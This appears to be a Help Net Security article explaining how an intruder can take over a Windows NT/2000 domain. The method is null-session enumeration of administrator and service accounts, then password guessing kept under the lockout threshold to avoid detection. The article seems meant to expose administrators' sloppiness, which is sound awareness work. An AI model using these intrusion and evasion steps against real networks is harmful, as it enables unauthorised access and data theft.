The following exploit can grant complete control of an organisation’s Windows network in less than 20 minutes. As usual, the exploit works thanks to a combination of ignorance and sloppiness (or lack of investment). Plug in a Windows laptop anywhere on the organisation’s network - this can be in head office, at a branch office or store, anywhere in any trusted third-party premises or perhaps through a dial-up connection. Browse the network using Windows Explorer and you'll get to see all the Windows machines on the network - there's no need to logon or join a domain for this to happen. Select a server (they're usually named in a obvious fashion) and attempt a "null session" connection - null sessions is a standard feature of NT & Windows 2000 which enable you to list users, groups, group memberships, etc. without any form of authentication whatsoever. And, yes, there's plenty of software on the Internet which will help you to establish a null session and then interrogate this information - my personal favourite is Hyena, a tool designed for managing Windows networks. Now list the users in the Administrators and Domain Admins groups and look for patterns, or rather exceptions to a pattern. Typically, organisations use obvious naming conventions for user accounts, but these are usually ignored where service accounts are concerned (Service accounts are administrator-level accounts used to enable applications to log on to servers and domains - applications such as Backupexec, Arcserve and Tivoli are obvious examples). Select each of these service accounts in turn and try to guess its password - it's not as hard as you might think. Frequently, network administrators will select something obvious, such as a password the same as the account name! Beware that you don't exceed the account lockout threshold, otherwise even the most harassed admin will guess something is up. If these fail, try those accounts which look like shared administrator accounts or scripted accounts, such as Administrator, Install, AutoInstall or similar. At least fifty percent of the time you'll gain Domain Admin access, allowing you create your own administrator account, join the domain legitimately and help yourself to any information on any server.
By subscribing to our early morning news update, you will receive a daily digest of the latest security news published on Help Net Security.
With over 500 issues so far, reading our newsletter every Monday morning will keep you up-to-date with security risks out there.